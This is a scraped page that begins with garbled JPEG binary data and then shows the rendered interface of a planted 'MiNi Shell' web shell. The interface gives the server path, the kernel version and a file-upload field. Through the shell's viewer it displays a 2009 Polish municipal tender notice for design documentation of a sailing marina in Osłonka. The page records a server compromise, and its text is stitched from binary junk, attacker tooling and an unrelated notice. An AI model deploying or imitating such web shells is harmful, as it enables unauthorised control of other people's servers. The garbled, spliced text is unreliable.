JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/37033-N-2009.html

<p class="kh_header"><b>Nowy Dwór Gdański: Opracowanie dokumentacji projektowo-kosztorysowej
Budowy przystani żeglarskiej w Osłonce gmina Nowy Dwór Gdański
do realizacji w ramach projektu Pętla Żuławska - rozwój turystyki wodnej</b><br>
<b>Numer ogłoszenia: 37033 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gminy Nowy Dwór Gdański , ul. Wejhera 3, 82-100 Nowy Dwór Gdański, woj. pomorskie, tel. 055 2472401, faks 055 2472405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastonowydwor.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej
Budowy przystani żeglarskiej w Osłonce gmina Nowy Dwór Gdański
do realizacji w ramach projektu Pętla Żuławska - rozwój turystyki wodnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:

Opracowanie dokumentacji projektowo-kosztorysowej Budowy przystani żeglarskiej w Osłonce gmina Nowy Dwór Gdański do realizacji w ramach projektu Pętla Żuławska - rozwój turystyki wodnej


Nazewnictwo wg CPV:

		71322000-1	Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej
71322000-7	Usługi inżynieryjne w zakresie projektowania

	Zamawiający wymaga aby dokumentacje budowlano-wykonawcze i kosztorysowe zostały opracowane 
w oparciu o opracowaną przez: Biuro PROJECT-SYSTEM arch. Piotra Pałdynę, 82-300 Elbląg, ul. Kumieli 2 koncepcję budowy centrum rekreacyjnego w Osłonce (Załącznik nr 4 do SIWZ), wyłącznie dla zakresu ujętego w koncepcji, 
z uwzględnieniem zmian wynikających z zapisów SIWZ.

2. Zamawiający zaleca, aby Wykonawca przeprowadził wizję w terenie w celu ustalenia pełnego zakresu prac związanych z realizacją zamówienia.

3. Projekty techniczne muszą być wykonane przez osoby posiadające uprawnienia projektowe w odpowiedniej specjalności. Dokumentację projektowo-kosztorysową należy sporządzić zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z 2004 r.) oraz Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389 z 2004 r.).

4. Wykonawca zobowiązany jest do uzyskania wszelkich wymaganych dla tego obiektu lub robót opinii, sprawdzeń 
i uzgodnień niezbędnych do uzyskania pozwolenia na budowę i późniejszego użytkowania zgodnie ze szczegółowymi przepisami. Projekty techniczne muszą posiadać klauzulę zespołu sprawdzającego (w przypadku takiego wymogu) 
i oświadczenia o kompletności.

5. Przyjęte rozwiązania odpowiadać będą zasadom wiedzy technicznej, obowiązującym Polskim Normom i przepisom techniczno - budowlanym.

6. Zamawiający stawia wymóg pełnej zgodności między rozwiązaniami zawartymi w projektach, a częścią kosztorysową. Projekt musi być spójny i skoordynowany we wszystkich branżach, jak również zawierać optymalne rozwiązania konstrukcyjne, materiałowe i kosztowe.
	Część kosztorysowa po jej wykonaniu musi być sprawdzona i zatwierdzona pod względem rzeczowym 
i prawidłowością jej wykonania przez Wykonawcę.

7. Zamawiający zastrzega sobie możliwość uczestniczenia Wykonawcy w pracach komisji przetargowej zmierzającej 
do wyłonienia wykonawcy robót, w szczególności poprzez odpowiadanie na zapytania wykonawców dotyczące przetargu.

8. Wykonawca przekaże ZZK i kosztorysy inwestorskie Kierownikowi Referatu Inwestycji z siedzibą w Urzędzie Miejskim w Nowym Dworze Gdańskim przy ul. Wejhera 3 w zamkniętej kopercie na podstawie odrębnego protokołu.

9. Uprawnienia Zamawiającego z tytułu rękojmi za wady dokumentacji technicznej wygasają w stosunku 
do Wykonawcy dokumentacji wraz z wygaśnięciem odpowiedzialności Wykonawcy robót z tytułu rękojmi za roboty wykonane na podstawie tej dokumentacji.

10. Wykonawca zobowiązany jest do ubezpieczenia się od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej i przedstawienia na dzień zawarcia umowy jako załącznika polisy ubezpieczeniowej, 
a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, obejmującego okres realizacji zamówienia.

11. Zakres zamówienia:
	Zakres zamówienia obejmuje:
	1) Pozyskanie mapy do celów projektowych;
	2) Wykonanie raportu o oddziaływaniu przedsięwzięcia na środowisko;
	3) Wystąpienie w imieniu Zamawiającego do odpowiednich instytucji i organów i uzyskanie:
	    - decyzji o środowiskowych uwarunkowaniach,
	    - pozwoleń wodno-prawnych,
	    - pozwolenia na budowę na zakres robót objętych opracowaniem i wymagających pozwolenia 
	      na budowę,
	    - o wydanie warunków technicznych na dostawę mediów;
	4) Opracowanie dokumentacji hydrotechnicznej;
	5) Wykonanie dokumentacji geologiczno-inżynierskiej;
	6) Opracowanie dokumentacji projektowej (projekt architektoniczno-budowlany 
	    i projekty wykonawcze - we wszystkich branżach) po 7 egzemplarzy każdej 
	    + w wersji elektronicznej;
	7) Opracowanie dokumentacji na rozbiórkę istniejącego obiektu wraz ze zgłoszeniem zamiaru 
	    rozbiórki obiektu budowlanego;
	8) Wykonanie przedmiarów robót we wszystkich branżach w układzie specyfikacyjnym;
	9) Wykonanie kosztorysu inwestorskiego zgodnie z obowiązującymi przepisami w zakresie formy 
	    i metod sporządzania kosztorysu inwestorskiego z rozbiciem na elementy i branże;
	10) Opracowanie specyfikacji technicznych wykonania i odbioru robót;
	11) Uzyskanie zgody właścicieli urządzeń technicznych i sieci, właścicieli działek na udostępnienie 
	      terenu, a w przypadku niemożności uzyskania takiej zgody, odpowiednich decyzji, orzeczeń 
	      zastępujących oświadczenia ww. właścicieli, oraz innych dokumentów związanych 
	      z wykonaniem zamówienia, a wymaganych obowiązującymi przepisami prawa - pozwoleń, 
	      zgód, porozumień, warunków technicznych, warunków realizacyjnych, uzgodnień w przypadku 
	      zaistnienia takiej konieczności;
	12) Wykonanie zbiorczego zestawienia kosztów (ZZK).


Dla inwestycji: Inwestycja jest zlokalizowana nad brzegiem rzeki Szkarpawa

	Działka nr 32/4 (Księga Wieczysta 233).
	Powierzchnia terenu objętego inwestycją: ok. 0,1768 ha.

Część lądowa
	Zakłada się zagospodarowanie przedmiotowego terenu pod potrzeby małej przystani.
	Projekt przewiduje budowę Punktu informacji turystycznej w miejsce istniejącego obiektu. Powstaną także: wiata biesiadna, boisko do piłki plażowej oraz pole namiotowe z punktami poboru wody pitnej i energii. Teren zostanie ogrodzony, wyposażony w oświetlenie; wykonane zostaną nawierzchnie pieszo-jezdne z kostki betonowej oraz droga dojazdowa z płyt ażurowych.

Część infrastrukturalna
	- przyłącza wody,
	- kanalizacja sanitarna z bezodpływowym zbiornikiem ścieków,
	- przyłącza energii elektrycznej,
	- sieci oświetlenia terenu,

Część kubaturowa i zagospodarowanie terenu
	- budynek Punktu Informacji Turystycznej - budynek wolnostojący, powierzchnia zabudowy
	  do 94m2 (zmniejszona w stosunku do założonej w Koncepcji) w technologii tradycyjnej, 
	  niepodpiwniczony, parterowy, z poddaszem użytkowym; instalacje wody zimnej, instalacje energii 
	  elektrycznej, instalacje co oraz cwu z kotłownią na olej opałowy; sanitariaty;
	- rozbiórka istniejącego budynku;
	- wiata o powierzchni 40 m2 oraz pole namiotowe z punktami poboru wody pitnej
	  i punktami poboru energii.

Rodzaje nawierzchni:
	- remont istniejącej drogi dojazdowej do budynku punktu informacji turystycznej na wale 
	  przeciwpowodziowym z płyt jomb;
	- drogi wewnętrzne o nawierzchni z betonowych płyt ażurowych;
	- nawierzchnia z kostki betonowej;
	- boisko do piłki siatkowej o pow. piaszczystej 128 m2 (16x8).

Część hydrotechniczna:
	- 2 pomosty przystosowane do cumowania łodzi;
	- umocnienie brzegu przy pomostach oraz dwie sztuki trapów zejściowych do pomostów;
	- dokumentacje nie powinny obejmować kąpieliska (uwzględnionego w Koncepcji)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.20.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy: 

1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

	Warunkiem udziału w postępowaniu jest:
	a) wykonanie w okresie trzech lat przed dniem wszczęcia postępowania co najmniej 1 usługi 
	odpowiadającej swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia,
	tj. opracowanie co najmniej 1 dokumentacji projektowo-kosztorysowych dotyczących budowy 
	lub przebudowy pomostów do cumowania łodzi oraz obiektów użyteczności publicznej;
	- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentów wymienionych
	w pkt VI. ppkt 1.5. SIWZ

	b) dysponowanie projektantami posiadającymi uprawnienia projektowe w wymaganej specjalności 
	oraz będącymi członkami właściwych okręgowych izb samorządu zawodowego. Zgodnie z ustawą 
	o samorządach zawodowych architektów, inżynierów budownictwa i urbanistów (Dz. U. z 2001 r., 
	Nr 5, poz. 42) projektanci muszą posiadać uprawnienia projektowe w wymaganej specjalności 
	i muszą być członkami właściwych okręgowych izb samorządu zawodowego.
	- potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie dokumentów wymienionych 
	w pkt VI. ppkt 1.3., 1.4. SIWZ

3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
- potwierdzenia spełnienia warunków wymienionych w pkt 3. i 4. SIWZ Zamawiający dokona na podstawie oświadczeń

	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Potwierdzenia spełniania warunków udziału w postępowaniu:

	1.1. Oświadczenia wynikające z art. 22 i 24 ustawy Prawo zamówień publicznych.
	Uwaga:
	a) Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ;
	b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia 
	    składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

	1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji 
	działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
	do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy 
	przed upływem terminu składania ofert.
	Uwaga:
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa 
	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

	1.3. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
	w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
	doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
	wykonywanych przez nie czynności.
	Uwaga:
	a) Na potwierdzenie spełniania warunku określonego w pkt V. ppkt 2. b) SIWZ w wykazie osób 
	    należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi 
	    Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych 
	    podmiotów;
	b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej 
	    wymieniony dokument Wykonawcy składają wspólnie.

	1.4. Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu 
	zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
	takich uprawnień.
	Uwaga:
	a) Dla projektantów wymienionych w wykazie, o którym mowa w pkt 1.3. SIWZ, należy złożyć 
	    z ofertą dokumenty potwierdzające spełnienie warunku wymienionego w pkt V. ppkt 2. b), tj.: 
	    uprawnienia projektowe w wymaganej specjalności oraz zaświadczenia o przynależności 
	    projektantów do właściwych okręgowych izb samorządu zawodowego;
	b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej 
	    wymienione dokumenty Wykonawcy składają wspólnie.

	1.5. Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia 
	postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy
	- w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot 
	zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie 
	dokumentów potwierdzających, że te usługi zostały wykonane należycie.
	Uwaga:
	a) W wykazie należy wymienić usługi potwierdzające spełnienie przez Wykonawcę warunku 
	    określonego w pkt V. ppkt 2. a) SIWZ;
	b) W przedmiocie wykazywanej usługi należy wskazać czy dokumentacja dotyczyła budowy 
	    obiektu użyteczności publicznej oraz budowy lub rozbudowy pomostów do cumowania łodzi;
	c) Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te usługi 
	    zostały wykonane należycie;
	d) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty 
	    składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wielkości 
	    stanowiące o spełnieniu warunku będą zsumowane w pkt V. ppkt 2. a) SIWZ.

	1.6. Oświadczenie Wykonawcy, że nie zalega z uiszczaniem podatków, opłat, składek 
	na ubezpieczenie społeczne i zdrowotne lub zaświadczenie, że uzyskał przewidziane prawem 
	zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
	wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem 	terminu składania ofert.

2.Potwierdzenia spełniania przez oferowane usługi wymagań określonych przez Zamawiającego 
w SIWZ:

	2.1. Oświadczenie wynikające z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych.
	Uwaga:
	a) Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ;
	b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie 
	    składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem 
przez Wykonawcę.

UWAGA:

1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości.
	Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
	Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.miastonowydwor.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowym Dworze Gdańskim, 82-100 Nowy Dwór Gdański, ul. Wejhera 3, pokój Nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2009 godzina 09:30, miejsce: Urząd Miejski w Nowym Dworze Gdańskim, 82-100 Nowy Dwór Gdański, ul. Wejhera 3, pokój Nr 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com